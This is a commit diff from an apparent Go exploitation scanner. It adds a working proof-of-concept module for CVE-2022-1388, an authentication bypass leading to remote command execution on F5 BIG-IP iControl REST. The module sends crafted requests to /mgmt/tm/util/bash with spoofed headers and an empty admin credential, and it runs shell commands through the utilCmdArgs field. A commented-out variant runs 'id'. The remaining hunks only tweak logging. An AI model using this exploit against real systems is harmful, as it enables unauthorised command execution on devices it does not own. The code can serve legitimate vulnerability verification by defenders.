支持漏洞 CVE-2022-1388 验证

Author: SummerSec

cmd/commons/attack/attack.go

@@ -36,6 +36,7 @@ func addPoc(pocs map[string]interface{}) map[string]interface{} {
 	pocs["CVE202222963"] = &_022.CVE202222963{}
 	pocs["CVE202126084"] = &_021.CVE202126084{}
 	pocs["CVE202222965"] = &_022.CVE202222965{}
+	pocs["CVE20221388"] = &_022.CVE20221388{}
 	return pocs
 
 }

cmd/commons/poc/2022/CVE-2022-1388.go

@@ -0,0 +1,88 @@
+package _022
+
+// 参考 https://github.com/numanturle/CVE-2022-1388/blob/main/bigip-icontrol-rest-rce.yaml
+import (
+	"encoding/json"
+	req2 "github.com/SummerSec/SpringExploit/cmd/commons/req"
+	"github.com/SummerSec/SpringExploit/cmd/commons/utils"
+	"github.com/fatih/structs"
+	"github.com/imroc/req/v3"
+	log "github.com/sirupsen/logrus"
+	"net/url"
+	"strings"
+)
+
+type CVE20221388 struct{}
+
+func (t CVE20221388) SendPoc(target string, hashmap map[string]interface{}) {
+	log.Debug("[+] Start CVE-2022-1388")
+
+	reqinfo := req2.NewReqInfo()
+	reqmap := structs.Map(reqinfo)
+
+	// 初始化请求
+	// TODO 可以设置超时时间 重复次数 代理等 下面默认使用默认值
+	reqmap["timeout"] = hashmap["Timeout"].(int)
+	reqmap["retry"] = hashmap["Retry"].(int)
+	reqmap["proxy"] = hashmap["Proxy"].(string)
+	reqmap["mode"] = hashmap["Mode"].(int)
+
+	u, _ := url.Parse(target)
+	path := "/mgmt/tm/util/bash"
+	reqmap["url"] = u.Scheme + "://" + u.Host + path
+	reqmap["method"] = "POST"
+
+	headers := map[string]string{
+		"Host":            "localhost",
+		"User-Agent":      utils.GetUA(),
+		"Connection":      "keep-alive,x-f5-auTh-tOKen",
+		"Authorization":   "Basic YWRtaW46",
+		"X-F5-Auth-Token": utils.GetCode(5),
+		"Content-Type":    "application/json",
+	}
+
+	reqmap["headers"] = headers
+
+	randstr := utils.GetCode(10)
+	log.Debugf("[+] randstr: %s", randstr)
+	base64str := utils.EncodeString(randstr)
+	log.Debugf("[+] base64str: %s", base64str)
+
+	reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c 'echo " + base64str + " | base64 -d'\"}"
+	//reqmap["body"] = "{\"command\":\"run\",\"utilCmdArgs\":\"-c id\"}"
+	log.Debug("[+] Send CVE-2022-1388 request")
+	resp := utils.Send(reqmap)
+
+	if t.CheckExp(resp, randstr, hashmap) {
+		t.SaveResult(target, hashmap["Out"].(string))
+
+	}
+
+}
+
+func (CVE20221388) SaveResult(target string, file string) {
+	result := target + " 存在 CVE-2022-1388漏洞"
+	err := utils.SaveToFile(result, file)
+	log.Info(result)
+	if err != nil {
+		return
+	}
+
+}
+
+func (CVE20221388) CheckExp(resp *req.Response, randstr string, hashmap map[string]interface{}) bool {
+	res := resp.String()
+	log.Debugf(res)
+	if strings.Contains(res, randstr) {
+		// 将res 转化成map
+		var maps map[string]interface{}
+		err := json.Unmarshal([]byte(res), &maps)
+		log.Info("CVE-2022-1388 命令执行返回 commandResult: ", maps["commandResult"])
+		if err != nil {
+			log.Debugf("[-] json.Unmarshal error: %s", err)
+			return false
+		}
+		return true
+	}
+	return false
+}

cmd/commons/poc/2022/CVE-2022-22963.go

@@ -61,7 +61,7 @@ func (CVE202222963) init() {
 }
 
 func (CVE202222963) SaveResult(target string, file string) {
-	context := target + "   存在CVE-2022-22963漏洞\n"
+	context := target + "   存在CVE-2022-22963漏洞"
 	utils.SaveToFile(context, file)
 }
 

cmd/commons/utils/httpclient.go

@@ -52,8 +52,8 @@ func Send(hashmap map[string]interface{}) (resp *req.Response) {
 		return nil
 	}
 	log.Debugln("send request success")
-	res := resp.Dump()
-	log.Debugln("response:	" + res)
+	//res := resp.Dump()
+	//log.Debugln("response:	" + res)
 
 	return resp
 }

cmd/commons/utils/readfile.go

@@ -10,6 +10,7 @@ import (
 )
 
 func ReadFile(path string) (urls []string, err error) {
+	log.Info("Reading file: ", path)
 	file, err := os.Open(path)
 	if err != nil {
 		log.Error("An error occurred on opening the inputfile\n" +
@@ -33,7 +34,7 @@ func ReadFile(path string) (urls []string, err error) {
 			return lins, err // error or EOF
 		}
 		str = str[:len(str)-2]
-		log.Infoln("The url is : ", str)
+		log.Debugf("The url is : ", str)
 		lins = append(lins, str)
 	}
 	return lins, nil